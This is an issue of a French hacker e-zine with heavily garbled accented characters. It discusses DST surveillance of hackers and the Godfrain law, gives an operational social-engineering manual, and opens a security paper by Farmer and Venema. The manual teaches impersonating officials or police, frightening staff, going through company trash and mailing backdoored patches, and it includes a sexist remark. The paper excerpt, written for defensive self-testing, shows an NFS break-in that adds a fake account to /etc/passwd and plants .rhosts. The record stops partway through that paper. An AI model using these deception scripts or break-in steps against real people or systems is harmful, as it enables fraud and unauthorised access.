Si par exemple, ils ne sont pas sur qu'une personne <20> telle adresse
|
|||
|
soit un hacker, ils peuvent envoyer des personnes d<>guis<69>es en
|
|||
|
femme de m<>nage (je ne suis pas parano) sans aucun probl<62>me. Il ont
|
|||
|
des relations qui leur permettent d'avoir * n'importe * quelle
|
|||
|
information provenant d'une <20>cole par le censeur ou m<>me les profs.
|
|||
|
Les <20>coutes sont bien s<>r monaie courante et ils n'ont pas besoin
|
|||
|
faire des <20>coutes sauvages... Une carte de la DST ouvre tous les
|
|||
|
Centres Principaux d'Exploitation sans probl<62>me.
|
|||
|
Ils utilisent d'autre part une technologie de pointe au niveau de
|
|||
|
l'espionnage informatique. Il s'agit du TEMPEST.
|
|||
|
Le principe en est ma foi tr<74>s simple. Vous savez certainnement que
|
|||
|
tout courant qui passe dans un fil <20>l<EFBFBD>ctrique non-blind<6E> produit un
|
|||
|
champ magn<67>tique et qu'un circuit electronique en fonctionnement
|
|||
|
poss<EFBFBD>de des composants <20>lectroniques qui oscillent quand ils sont
|
|||
|
dans certains <20>tats et ainsi emettent soit sur une frequence
|
|||
|
radio<EFBFBD>l<EFBFBD>ctrique soit avec un signal <20>lectromagnique. Ces signaux
|
|||
|
peuvent <20>tre d<>tect<63> de tr<74>s loin gr<67>ce <20> des instruments
|
|||
|
de haute pr<70>cision. On peut tr<74>s bien d<>coder les caract<63>res frapp<70>
|
|||
|
sur un clavier qui transitent par le cable ou bien ce qui s'affiche
|
|||
|
sur un <20>cran.
|
|||
|
Le TEMPEST est l'ensemble ORDINATEUR - DECODEUR - AMPLIFICATEUR -
|
|||
|
ANTENNE qui permet de recevoir en clair les informations provenant
|
|||
|
de l'ordinateur distant sans aucune liaison que ce soit (<28> part
|
|||
|
l'air).
|
|||
|
Ils ont l'habitude de faire du TEMPEST sur les claviers, les disques
|
|||
|
durs, les minitels et les cables modem (jamais sur le CPU).
|
|||
|
|
|||
|
Quand <20> leurs m<>thodes, eh bien elles sont simples et efficaces
|
|||
|
en g<>n<EFBFBD>ral.
|
|||
|
Tout d'abord, il y a une surveillance constante des serveurs <20>
|
|||
|
risques comme ceux des anciens pirates, des serveurs comme RTEL o<>,
|
|||
|
d'une mani<6E>re ou d'une autre, il s'arrangent pour "tenir" le SYSOP
|
|||
|
et lui imposer un scan sur des mots-cles comme "hacker", "blue box"
|
|||
|
"pirat","NUA","TRANSPAC","NUI","CC","CARTE PASTEL"du style grep(1).
|
|||
|
Bien sur, si un club leur parait suspect, ils peuvent aussitot
|
|||
|
passer un coup de fil au SYSOP et lui demander le Pass.
|
|||
|
Vous pensez bien aussi que toutes les adresses laiss<73>es en BAL sont
|
|||
|
relev<EFBFBD>es.
|
|||
|
(liste des serveurs <20>cout<75>s & filtr<74>s: QSD/The Line, RTEL, CHEZ,
|
|||
|
TEASER et bien s<>r RTEL.)
|
|||
|
(liste des serveurs tr<74>s certainnements soumis <20> ces pratiques:
|
|||
|
ELIOTT, POUR, PIRATE, AATEL)
|
|||
|
Ils s'arrangent aussi pour r<>cuperer le log des appelants avec les
|
|||
|
adresses des PAVIs correspondants aux pseudos.
|
|||
|
Ainsi, ils ont une table approximative qui donne pour chaque pseudo le
|
|||
|
d<EFBFBD>partement d'origine.
|
|||
|
Une histoire significative de leur m<>thode est arriv<69>e en
|
|||
|
1988-1989 avec Jean Claude Michot alors SYSOP de QBBS.
|
|||
|
Si vous vous rappelez bien, QBBS demandait l'adresse et le num<75>ro de
|
|||
|
t<EFBFBD>l<EFBFBD>phone de chaque user voulant avoir un compte. Il <20>tait pr<70>cis<69> que
|
|||
|
cela resterait confidentiel.
|
|||
|
Mais JCM <20>tait un pirate (pas un des meilleurs), et de plus, il n'avait
|
|||
|
pas grande morale. JCM donc s'<27>tait fait prendre par la DST, et ils ont
|
|||
|
marchand<EFBFBD> un abandon des charges vis <20> vis de son affaire (le
|
|||
|
troc de sa libert<72>) contre le fichier d'adresse avec la correspondance
|
|||
|
avec le pseudo.
|
|||
|
JCM qui n'est pas tr<74>s respectable ni hon<6F>te <20> pr<70>f<EFBFBD>r<EFBFBD> divulguer ce
|
|||
|
fichier plut<75>t que d'assumer son erreur! (non pas d'avoir pirat<61>, sa
|
|||
|
seule erreur est celle de s'<27>tre fait prendre <20> mon sens!)
|
|||
|
Mais je suis s<>r que la DST a <20>t<EFBFBD> tr<74>s persuasive ce qui peut quelque
|
|||
|
peu nous permettre de le pardonner.
|
|||
|
La DST quand elle est d<>munie de moyens de tracking contre une
|
|||
|
personne ou un groupe s'arrange pour d'abord voir qui fait quoi (quels
|
|||
|
pseudos sont les auteurs de tel ou tel hack) puis ensuite essaye de
|
|||
|
voir avec quelles personnes correspondent le hacker.
|
|||
|
Ils s'arrangent pour trouver les personnes susceptibles sur le serveur
|
|||
|
d'avoir le num<75>ro de t<>l<EFBFBD>phone du hacker ou ses coordonn<6E>es et ensuite
|
|||
|
font une descente chez ces dites personnes.
|
|||
|
En leur faisant vraiment tr<74>s tr<74>s peur et avec leur terrible persuasion,
|
|||
|
ils arrivent presque toujours a faire comprendre a cette personne qu'elle
|
|||
|
n'aura pas d'ennui si elle dit le num<75>ro de tel ou tel pseudo (qui est le
|
|||
|
hacker).
|
|||
|
Encore une bonne raison de ne pas montrer son amiti<74> envers certainne
|
|||
|
personne en public et une encore meilleure raison pour ne jamais, Oh grand
|
|||
|
jamais, donner ses coordonn<6E>es ou son num<75>ro de t<>l<EFBFBD>phone.
|
|||
|
|
|||
|
>La DST et la loi Godfrain:
|
|||
|
==========================
|
|||
|
Personnellement, j'en ai beaucoup voulu <20> la DST pour ses actions
|
|||
|
que je trouvais injustes mais finalement, on ne peut pas trop s'attaquer
|
|||
|
(au point de vue id<69>ologique je parle) <20> la DST et <20> ses actions.
|
|||
|
Mais la DST n'est qu'un outil du pouvoir et par pouvoir, je fais r<>f<EFBFBD>rence
|
|||
|
au syst<73>me soit-disant "d<>mocratique" non au mouvement politique qui
|
|||
|
pourrait <20>tre en place <20> ce moment. Je ne veux pas traiter de politique
|
|||
|
ici, ce n'est absolument pas le but de ce Newsletter/Technical Journal.
|
|||
|
Ce qui est mauvais est en fait seulement la Loi Godfrain anti-hacker.
|
|||
|
Cette loi en effet d<>signe comme d<>lit le fait de venir sur un syst<73>me
|
|||
|
d'information. Mais <20> ce moment, comment diff<66>rencier un syst<73>me o<> l'on
|
|||
|
a le droit d'acc<63>der d'un syst<73>me o<> cela est interdit.
|
|||
|
Un message: "Acces <20> cet ordinateur interdit aux personnes non autoris<69>es"
|
|||
|
ne suffit pas <20> mon avis.
|
|||
|
Qui sont les personnes non autoris<69>es?
|
|||
|
De plus, ce genre de message est g<>n<EFBFBD>ralement en Anglais, je ne suis
|
|||
|
absolument pas pour la francisation de tout mais tout le monde ne comprend
|
|||
|
pas l'anglais! [FUCK TOUBON au fait, ++NeurAlien/94]
|
|||
|
De toute facon, la loi reste la m<>me pour les syst<73>mes ayant une banni<6E>re de
|
|||
|
pr<EFBFBD>vention que pour les syst<73>mes sans. Ainsi, demain on peut venir m'arr<72>ter
|
|||
|
pour <20>tre all<6C> sur RTEL ou sur TEASER!
|
|||
|
Est-ce normal?
|
|||
|
A ce moment, c'est la porte ouverte <20> la loi de classe... En effet, une telle
|
|||
|
loi sera applicable <20> toute personne et seule les personnes g<>nantes pour
|
|||
|
l'<27>tat seront vis<69>es.
|
|||
|
Dans cette vision, on aura bient<6E>t plus besoin de justifier une arrestation.
|
|||
|
Et pourtant ce n'est pas "1984", ce sont seulement les cons<6E>quences de 1988
|
|||
|
(date du vote de cette loi).
|
|||
|
J'aimerai interviewer les votants pour cette loi et voir s'ils mesuraient
|
|||
|
l'ampleur de leur vote.
|
|||
|
|
|||
|
>CONCLUSION:
|
|||
|
===========
|
|||
|
Nous poss<73>dons quand m<>me des moyens de nous faire entendre.
|
|||
|
La branche active des H / P peut laisser des messages d'informations sur les
|
|||
|
syst<EFBFBD>mes "ouverts" et la branche m<>diatique peut informer les mass-m<>dias.
|
|||
|
Mais l<> encore, le gouvernement aura beaucoup de mal <20> revenir sur une de
|
|||
|
ses erreurs et utilisera tout son pouvoir de manipulation d'opinion pour
|
|||
|
persuader les Fran<61>ais du bien fond<6E> de cette loi.
|
|||
|
Nous avons m<>me la possibilit<69> de faire un lobbie comme aux USA, un
|
|||
|
groupe de pression et faire changer cette loi. Mais tout reste <20> faire et
|
|||
|
nous ne devons pas laisser ces politicards grabataires, avides de pouvoir et
|
|||
|
d'argent faire des lois r<>pressives donnant aux juges-pantin les pleins
|
|||
|
pouvoirs sur nos existences.
|
|||
|
L'image de l'underground a <20>t<EFBFBD> trop souvent terni par les soci<63>t<EFBFBD>s
|
|||
|
ayant peur de notre capacit<69> <20> montrer leurs incomp<6D>tences et leurs
|
|||
|
manipulations douteuses et aussi par les gouvernements voulant brider et
|
|||
|
dominer les moyens informatique et, pour cela, les limit<69>rent <20> leurs
|
|||
|
technocrates et leurs industries de pointe qu'ils controlent d<>ja.
|
|||
|
Imaginez seulement le r<>seau <20>tendu <20> chaque citoyen d'un pays.
|
|||
|
Ce serait la libre discussion et avec quelques r<>gles pour rendre le r<>seau
|
|||
|
viable, personne n'aurait plus <20> faire la guerre pour faire entendre son
|
|||
|
opinion. Ne serait-ce pas l<> la d<>mocratie?
|
|||
|
|
|||
|
Il est temps de montrer cette crasse politique et <20>conomique qui
|
|||
|
a d<>ja s<>rieusement limit<69> l'extension de ces merveilleuses technologies.
|
|||
|
Sensibilisez votre entourage. Montez vos propre moyens d'actions et faites
|
|||
|
entendre votre opinion. Nous somme une force qui peut tr<74>s bien lib<69>rer
|
|||
|
les r<>seaux de la main-mise des soci<63>t<EFBFBD>s et de l'<27>tat.
|
|||
|
|
|||
|
|
|||
|
L I B E R O N S L E S R E S E A U X ! ! !
|
|||
|
|
|||
|
free the net !
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.10
|
|||
|
|
|||
|
|
|||
|
><
|
|||
|
|
|||
|
:O :o :I :! :/ L'art du social engineering :O :o :I :! :/
|
|||
|
|
|||
|
><
|
|||
|
|
|||
|
par NeurAlien
|
|||
|
|
|||
|
Si utile contre les grosses entreprise "<22> la big brother", le social
|
|||
|
engineering permet d'attaquer un des points les plus faible de la soci<63>t<EFBFBD>:
|
|||
|
le personnel.
|
|||
|
|
|||
|
Je vais vous enseigner ici les choses que j'ai connue d'une pratique
|
|||
|
courante et de l'enseignement de The Dude, maitre en l'art du social
|
|||
|
engineering <20> Hack-Tic en Hollande.
|
|||
|
|
|||
|
Tout d'abord, le concept. Le social engineering couremment abrevi<76> SE
|
|||
|
est l'art de se faire passer pour quelqu'un d'autre pour avoir des informations
|
|||
|
sur n'importe quoi.
|
|||
|
Pour cela, il faut etre convaicant, r<>agir comme la vraie personne et surtout
|
|||
|
utiliser beaucoup de psychologie.
|
|||
|
|
|||
|
Exemple de SE classique:
|
|||
|
Employ<EFBFBD>e de FT au service exterieur: "France telecom bonjour,"
|
|||
|
Hacker: "Bonjour, Monsieur Levallois du CPE d'Orl<72>ans" [Toujours essayer de
|
|||
|
placer le maximum
|
|||
|
d'acronymes dans la
|
|||
|
conversation]
|
|||
|
H: "Nous avons besoin de la liste des pr<70>fixes de num<75>ro vert internationaux
|
|||
|
par pays car nous avons un probl<62>me avec un des carriers."
|
|||
|
FT: "Pardon? Je ne comprends pas bien. "
|
|||
|
H: "J'ai besoin de la liste des 0590 indiquant le pays selon le pr<70>fixe!"
|
|||
|
FT: "Attendez monsieur, je cherche... <pause> alors, Pour sprint....."
|
|||
|
[ Et voila, c'est gagn<67> ! ]
|
|||
|
|
|||
|
LA REGLE ULTIME DE CET ART
|
|||
|
|
|||
|
Il y a une chose et une seule qui vous garantira une maitrise parfaite
|
|||
|
des correspondants lors d'une s<>ance de SE, c'est la PRATIQUE.
|
|||
|
On peut lire tout ce que l'on voudra sur la serrurerie, si on ne pratique pas,
|
|||
|
on ne sera jamais un serrurier.
|
|||
|
|
|||
|
Donc lisez ce G-Phile avec toute l'attention que vos cellules grises
|
|||
|
peuvent y mettre et lancez vous.
|
|||
|
|
|||
|
Quelques r<>gles de base:
|
|||
|
=======================
|
|||
|
- preparez un petit papier avant d'appeler mentionnant qui vous etes, ce que
|
|||
|
vous voulez et preparant des reponses toutes pr<70>tes pour certaines questions
|
|||
|
bateaux. Mettez au point le scenario, votre nom, ce que vous voulez.
|
|||
|
- Toujours garder l'initiative dans la conversation: c'est vous qui posez les
|
|||
|
questions.
|
|||
|
- Ne pas faire du social engineering si votre voix est celle d'un jeune garcon
|
|||
|
de 13 ans.
|
|||
|
- ne jamais s'affoler ou raccrocher brutalement quand on vous pose un question
|
|||
|
qui vous d<>range.
|
|||
|
- faites le par fun si vous le voulez mais vous n'aurez jamais les meilleurs
|
|||
|
r<>sultats si vous le faites tout le temps d'une cabine sans pr<70>paration.
|
|||
|
- plus on a d'informations pointues sur la soci<63>t<EFBFBD>, plus le SE est possible.
|
|||
|
Il est des fois TRES fructueux de faire les poubelles de la soci<63>t<EFBFBD> avant
|
|||
|
d'essayer le SE sur ses employ<6F>s.
|
|||
|
|
|||
|
Quelques sc<73>narios qui marchent:
|
|||
|
===============================
|
|||
|
vous pouvez vous faire passer pour
|
|||
|
. utilisateur/acheteur
|
|||
|
. personne connue
|
|||
|
. urgence/flic/docteur
|
|||
|
. questionnaire/enqu<71>te
|
|||
|
. pour la presse, ca marche tres souvent mais on ne recoit pas d'information
|
|||
|
d<>taill<6C>e.
|
|||
|
Il faut aussi jouer sur les sentiments de votre correspondant:
|
|||
|
- la peur: en cas de probleme, faites comprendre que cela peut lui attirer des
|
|||
|
ennuis: foudres du patron, (pour l'employ<6F>)
|
|||
|
fisc sur le dos, (pour le petit patron d'une PME)
|
|||
|
arrestation, (pour un individu)
|
|||
|
coupure du t<>l<EFBFBD>phone,
|
|||
|
coupure EDF...
|
|||
|
- plaisir: collaboration contre cadeau ex: questionnaire avec un
|
|||
|
&greedy cadeau au bout si les reponses semblent v<>ritable en
|
|||
|
expliquant que c'est parce beaucoup de monde ne r<>pond pas
|
|||
|
en toute honnetet<65>.
|
|||
|
On peut aussi annoncer un FAX qui doit arriver et qui est assez confidentiel et
|
|||
|
necessitant une r<>ponse imm<6D>diate.
|
|||
|
Les bruits de bureaux en bruit de fond ou de salle d'ordinateur sont
|
|||
|
interressant.
|
|||
|
Etre <20> deux peut <20>tre utile car ainsi si il y a un probleme, vous dites:
|
|||
|
"bon, je vous passe mon sup<75>rieur mais il ne va pas <20>tre satisfait"
|
|||
|
appuyez sur une touche du t<>l<EFBFBD>phone et envoyez une petite musique directement
|
|||
|
au telephone."
|
|||
|
Ne pas dire que vous etes de la tele: cela ne fait pas reel!
|
|||
|
Pour un questionnaire, il peut <20>tre interressant de noyer les questions
|
|||
|
interressantes dans un flot de question ininterressantes.
|
|||
|
Un bon plan pour un coup de fil est:
|
|||
|
- depart lent ou on explique bien
|
|||
|
- des que la personne c<>de, on acc<63>l<EFBFBD>re le rythme pour qu'elle reste dans
|
|||
|
cet <20>tat d'esprit.
|
|||
|
Un autre est d'envoyer des patchs constructeurs par la poste concernant des
|
|||
|
failles de s<>curit<69> avec des backdoor dans les patchs.
|
|||
|
On peut aussi essayer de simuler un appel de la s<>curit<69> et d'envoyer un login.
|
|||
|
Il y a aussi la possibilit<69> de se faire passer pour la femme d'un informaticien
|
|||
|
qui lui a demand<6E> de t<>l<EFBFBD>charger un fichier depuis son t<>l<EFBFBD>phone de voiture
|
|||
|
pour qu'il puisse aller directement <20> un ses rendez vous apres etre passer chez
|
|||
|
lui prendre le fichier et qui n'arrive pas a se connecter. Enfin, se faire
|
|||
|
passer marche souvent bien quand on dit qu'on a un probleme car les femmes sont
|
|||
|
g<EFBFBD>n<EFBFBD>ralement prises pour des burnes en informatique.
|
|||
|
Utilisez les idiots.
|
|||
|
|
|||
|
En cas de probl<62>me lors de la conversation:
|
|||
|
==========================================
|
|||
|
Si on vous demande "Pourquoi voulez vous ceci..."
|
|||
|
2 r<>gles: - toujours r<>pondre
|
|||
|
- emphase sur le "PARCE QUE" (psycho involved)
|
|||
|
(r<>ponse bateau : "on en a besoin pour...." )
|
|||
|
Montrer que si ils facilitent les choses vous rendrez les choses plus faciles
|
|||
|
pour eux aussi.
|
|||
|
Si votre correspondant refuse de vous r<>pondre, demandez leur superviseur
|
|||
|
ou sup<75>rieur.
|
|||
|
|
|||
|
Les bonnes cibles:
|
|||
|
=================
|
|||
|
Le SE d<>pend <20>norm<72>ment de votre adaptation <20> la personne qui est <20>
|
|||
|
l'autre bout du fil. Vous devez toujours <20>tre en position de sup<75>riorit<69>.
|
|||
|
Pour cela, il faut d<>ja attaquer des personnes qui ont l'habitude de recevoir
|
|||
|
des ordres.
|
|||
|
|
|||
|
Ainsi, il est pr<70>f<EFBFBD>rable de ne pas parler <20> l'administrateur mais
|
|||
|
plutot <20> son assistant.
|
|||
|
|
|||
|
Bibliographie:
|
|||
|
=============
|
|||
|
Pr. Zuin "The first 4/5 minutes"
|
|||
|
Dale Carnegie "Hoz to win friends and influence people"
|
|||
|
Baladin Press "The private handbook"
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.11
|
|||
|
|
|||
|
|
|||
|
Nota: j'ai mis ce fichier car il traite presque parfaitement des nouveau type
|
|||
|
de hacking que l'on peut faire.
|
|||
|
C'est vraiment un document EXCELLENT !!
|
|||
|
_ _ _
|
|||
|
|
|||
|
_Improving the Security of Your Site by Breaking Into it_
|
|||
|
|
|||
|
Dan Farmer Wietse Venema
|
|||
|
Sun Microsystems Eindhoven University of Technology
|
|||
|
zen@sun.com wietse@wzv.win.tue.nl
|
|||
|
|
|||
|
Introduction
|
|||
|
------------
|
|||
|
|
|||
|
Every day, all over the world, computer networks and hosts are being
|
|||
|
broken into. The level of sophistication of these attacks varies
|
|||
|
widely; while it is generally believed that most break-ins succeed due
|
|||
|
to weak passwords, there are still a large number of intrusions that use
|
|||
|
more advanced techniques to break in. Less is known about the latter
|
|||
|
types of break-ins, because by their very nature they are much harder to
|
|||
|
detect.
|
|||
|
|
|||
|
-----
|
|||
|
|
|||
|
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
|
|||
|
Purdue. Sun. You name it, we've seen it broken into. Anything that is
|
|||
|
on the Internet (and many that isn't) seems to be fairly easy game. Are
|
|||
|
these targets unusual? What happened?
|
|||
|
|
|||
|
Fade to...
|
|||
|
|
|||
|
A young boy, with greasy blonde hair, sitting in a dark room. The room
|
|||
|
is illuminated only by the luminescense of the C64's 40 character
|
|||
|
screen. Taking another long drag from his Benson and Hedges cigarette,
|
|||
|
the weary system cracker telnets to the next faceless ".mil" site on his
|
|||
|
hit list. "guest -- guest", "root -- root", and "system -- manager" all
|
|||
|
fail. No matter. He has all night... he pencils the host off of his
|
|||
|
list, and tiredly types in the next potential victim...
|
|||
|
|
|||
|
This seems to be the popular image of a system cracker. Young,
|
|||
|
inexperienced, and possessing vast quantities of time to waste, to get
|
|||
|
into just one more system. However, there is a far more dangerous type
|
|||
|
of system cracker out there. One who knows the ins and outs of the
|
|||
|
latest security auditing and cracking tools, who can modify them for
|
|||
|
specific attacks, and who can write his/her own programs. One who not
|
|||
|
only reads about the latest security holes, but also personally
|
|||
|
discovers bugs and vulnerabilities. A deadly creature that can both
|
|||
|
strike poisonously and hide its tracks without a whisper or hint of a
|
|||
|
trail. The uebercracker is here.
|
|||
|
|
|||
|
-----
|
|||
|
|
|||
|
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
|
|||
|
uebermensch, or, literally translated into English, "over man."
|
|||
|
Nietzsche used the term not to refer to a comic book superman, but
|
|||
|
instead a man who had gone beyond the incompetence, pettiness, and
|
|||
|
weakness of the everyday man. The uebercracker is therefore the system
|
|||
|
cracker who has gone beyond simple cookbook methods of breaking into
|
|||
|
systems. An uebercracker is not usually motivated to perform random
|
|||
|
acts of violence. Targets are not arbitrary -- there is a purpose,
|
|||
|
whether it be personal monetary gain, a hit and run raid for
|
|||
|
information, or a challenge to strike a major or prestigious site or
|
|||
|
net.personality. An uebercracker is hard to detect, harder to stop, and
|
|||
|
hardest to keep out of your site for good.
|
|||
|
|
|||
|
Overview
|
|||
|
--------
|
|||
|
|
|||
|
In this paper we will take an unusual approach to system security.
|
|||
|
Instead of merely saying that something is a problem, we will look
|
|||
|
through the eyes of a potential intruder, and show _why_ it is one. We
|
|||
|
will illustrate that even seemingly harmless network services can become
|
|||
|
valuable tools in the search for weak points of a system, even when
|
|||
|
these services are operating exactly as they are intended to.
|
|||
|
|
|||
|
In an effort to shed some light on how more advanced intrusions occur,
|
|||
|
this paper outlines various mechanisms that crackers have actually used
|
|||
|
to obtain access to systems and, in addition, some techniques we either
|
|||
|
suspect intruders of using, or that we have used ourselves in tests or
|
|||
|
in friendly/authorized environments.
|
|||
|
|
|||
|
Our motivation for writing this paper is that system administrators are
|
|||
|
often unaware of the dangers presented by anything beyond the most
|
|||
|
trivial attacks. While it is widely known that the proper level of
|
|||
|
protection depends on what has to be protected, many sites appear to
|
|||
|
lack the resources to assess what level of host and network security is
|
|||
|
adequate. By showing what intruders can do to gain access to a remote
|
|||
|
site, we are trying to help system administrators to make _informed_
|
|||
|
decisions on how to secure their site -- or not. We will limit the
|
|||
|
discussion to techniques that can give a remote intruder access to a
|
|||
|
(possibly non-interactive) shell process on a UNIX host. Once this is
|
|||
|
achieved, the details of obtaining root privilege are beyond the scope
|
|||
|
of this work -- we consider them too site-dependent and, in many cases,
|
|||
|
too trivial to merit much discussion.
|
|||
|
|
|||
|
We want to stress that we will not merely run down a list of bugs or
|
|||
|
security holes -- there will always be new ones for a potential attacker
|
|||
|
to exploit. The purpose of this paper is to try to get the reader to
|
|||
|
look at her or his system in a new way -- one that will hopefully afford
|
|||
|
him or her the opportunity to _understand_ how their system can be
|
|||
|
compromised, and how.
|
|||
|
|
|||
|
We would also like to reiterate to the reader that the purpose of this
|
|||
|
paper is to show you how to test the security of your own site, not how
|
|||
|
to break into other people's systems. The intrusion techniques we
|
|||
|
illustrate here will often leave traces in your system auditing logs --
|
|||
|
it might be constructive to examine them after trying some of these
|
|||
|
attacks out, to see what a real attack might look like. Certainly other
|
|||
|
sites and system administrators will take a very dim view of your
|
|||
|
activities if you decide to use their hosts for security testing without
|
|||
|
advance authorization; indeed, it is quite possible that legal action
|
|||
|
may be pursued against you if they perceive it as an attack.
|
|||
|
|
|||
|
There are four main parts to the paper. The first part is the
|
|||
|
introduction and overview. The second part attempts to give the reader
|
|||
|
a feel for what it is like to be an intruder and how to go from knowing
|
|||
|
nothing about a system to compromising its security. This section goes
|
|||
|
over actual techniques to gain information and entrance and covers basic
|
|||
|
strategies such as exploiting trust and abusing improperly configured
|
|||
|
basic network services (ftp, mail, tftp, etc.) It also discusses
|
|||
|
slightly more advanced topics, such as NIS and NFS, as well as various
|
|||
|
common bugs and configuration problems that are somewhat more OS or
|
|||
|
system specific. Defensive strategies against each of the various
|
|||
|
attacks are also covered here.
|
|||
|
|
|||
|
The third section deals with trust: how the security of one system
|
|||
|
depends on the integrity of other systems. Trust is the most complex
|
|||
|
subject in this paper, and for the sake of brevity we will limit the
|
|||
|
discussion to clients in disguise.
|
|||
|
|
|||
|
The fourth section covers the basic steps that a system administrator
|
|||
|
may take to protect her or his system. Most of the methods presented
|
|||
|
here are merely common sense, but they are often ignored in practice --
|
|||
|
one of our goals is to show just how dangerous it can be to ignore basic
|
|||
|
security practices.
|
|||
|
|
|||
|
Case studies, pointers to security-related information, and software are
|
|||
|
described in the appendices at the end of the paper.
|
|||
|
|
|||
|
While exploring the methods and strategies discussed in this paper we we
|
|||
|
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
|
|||
|
shell, perl, expect and C, it examines a remote host or set of hosts and
|
|||
|
gathers as much information as possible by remotely probing NIS, finger,
|
|||
|
NFS, ftp and tftp, rexd, and other services. This information includes
|
|||
|
the presence of various network information services as well as
|
|||
|
potential security flaws -- usually in the form of incorrectly setup or
|
|||
|
configured network services, well-known bugs in system or network
|
|||
|
utilities, or poor or ignorant policy decisions. It then can either
|
|||
|
report on this data or use an expert system to further investigate any
|
|||
|
potential security problems. While SATAN doesn't use all of the methods
|
|||
|
that we discuss in the paper, it has succeeded with ominous regularity
|
|||
|
in finding serious holes in the security of Internet sites. It will be
|
|||
|
posted and made available via anonymous ftp when completed; Appendix A
|
|||
|
covers its salient features.
|
|||
|
|
|||
|
Note that it isn't possible to cover all possible methods of breaking
|
|||
|
into systems in a single paper. Indeed, we won't cover two of the most
|
|||
|
effective methods of breaking into hosts: social engineering and
|
|||
|
password cracking. The latter method is so effective, however, that
|
|||
|
several of the strategies presented here are geared towards acquiring
|
|||
|
password files. In addition, while windowing systems (X, OpenWindows,
|
|||
|
etc.) can provide a fertile ground for exploitation, we simply don't
|
|||
|
know many methods that are used to break into remote systems. Many
|
|||
|
system crackers use non-bitmapped terminals which can prevent them from
|
|||
|
using some of the more interesting methods to exploit windowing systems
|
|||
|
effectively (although being able to monitor the victim's keyboard is
|
|||
|
often sufficient to capture passwords). Finally, while worms, viruses,
|
|||
|
trojan horses, and other malware are very interesting, they are not
|
|||
|
common (on UNIX systems) and probably will use similar techniques to the
|
|||
|
ones we describe in this paper as individual parts to their attack
|
|||
|
strategy.
|
|||
|
|
|||
|
Gaining Information
|
|||
|
-------------------
|
|||
|
|
|||
|
Let us assume that you are the head system administrator of Victim
|
|||
|
Incorporated's network of UNIX workstations. In an effort to secure
|
|||
|
your machines, you ask a friendly system administrator from a nearby
|
|||
|
site (evil.com) to give you an account on one of her machines so that
|
|||
|
you can look at your own system's security from the outside.
|
|||
|
|
|||
|
What should you do? First, try to gather information about your
|
|||
|
(target) host. There is a wealth of network services to look at:
|
|||
|
finger, showmount, and rpcinfo are good starting points. But don't stop
|
|||
|
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
|
|||
|
and as many other services as you can find. There are so many methods
|
|||
|
and techniques that space precludes us from showing all of them, but we
|
|||
|
will try to show a cross-section of the most common and/or dangerous
|
|||
|
strategies that we have seen or have thought of. Ideally, you would
|
|||
|
gather such information about all hosts on the subnet or area of attack
|
|||
|
-- information is power -- but for now we'll examine only our intended
|
|||
|
target.
|
|||
|
|
|||
|
To start out, you look at what the ubiquitous finger command shows you
|
|||
|
(assume it is 6pm, Nov 6, 1993):
|
|||
|
|
|||
|
victim % finger @victim.com
|
|||
|
[victim.com]
|
|||
|
Login Name TTY Idle When Where
|
|||
|
zen Dr. Fubar co 1d Wed 08:00 death.com
|
|||
|
|
|||
|
Good! A single idle user -- it is likely that no one will notice if you
|
|||
|
actually manage to break in.
|
|||
|
|
|||
|
Now you try more tactics. As every finger devotee knows, fingering "@",
|
|||
|
"0", and "", as well as common names, such as root, bin, ftp, system,
|
|||
|
guest, demo, manager, etc., can reveal interesting information. What
|
|||
|
that information is depends on the version of finger that your target is
|
|||
|
running, but the most notable are account names, along with their home
|
|||
|
directories and the host that they last logged in from.
|
|||
|
|
|||
|
To add to this information, you can use rusers (in particular with the
|
|||
|
-l flag) to get useful information on logged-in users.
|
|||
|
|
|||
|
Trying these commands on victim.com reveals the following information,
|
|||
|
presented in a compressed tabular form to save space:
|
|||
|
|
|||
|
Login Home-dir Shell Last login, from where
|
|||
|
----- -------- ----- ----------------------
|
|||
|
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
|
|||
|
bin /bin Never logged in
|
|||
|
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
|
|||
|
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
|
|||
|
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
|
|||
|
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
|
|||
|
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
|
|||
|
guest /export/foo /bin/sh Never logged in
|
|||
|
ftp /home/ftp Never logged in
|
|||
|
|
|||
|
Both our experiments with SATAN and watching system crackers at work
|
|||
|
have proved to us that finger is one of the most dangerous services,
|
|||
|
because it is so useful for investigating a potential target. However,
|
|||
|
much of this information is useful only when used in conjunction with
|
|||
|
other data.
|
|||
|
|
|||
|
For instance, running showmount on your target reveals:
|
|||
|
|
|||
|
evil % showmount -e victim.com
|
|||
|
export list for victim.com:
|
|||
|
/export (everyone)
|
|||
|
/var (everyone)
|
|||
|
/usr easy
|
|||
|
/export/exec/kvm/sun4c.sunos.4.1.3 easy
|
|||
|
/export/root/easy easy
|
|||
|
/export/swap/easy easy
|
|||
|
|
|||
|
Note that /export/foo is exported to the world; also note that this is
|
|||
|
user guest's home directory. Time for your first break-in! In this
|
|||
|
case, you'll mount the home directory of user "guest." Since you don't
|
|||
|
have a corresponding account on the local machine and since root cannot
|
|||
|
modify files on an NFS mounted filesystem, you create a "guest" account
|
|||
|
in your local password file. As user guest you can put an .rhosts entry
|
|||
|
in the remote guest home directory, which will allow you to login to the
|
|||
|
target machine without having to supply a password.
|
|||
|
|
|||
|
evil # mount victim.com:/export/foo /foo
|
|||
|
evil # cd /foo
|
|||
|
evil # ls -lag
|
|||
|
total 3
|
|||
|
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
|
|||
|
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
|
|||
|
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
|
|||
|
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
|
|||
|
evil # ls -lag
|
|||
|
total 3
|
|||
|
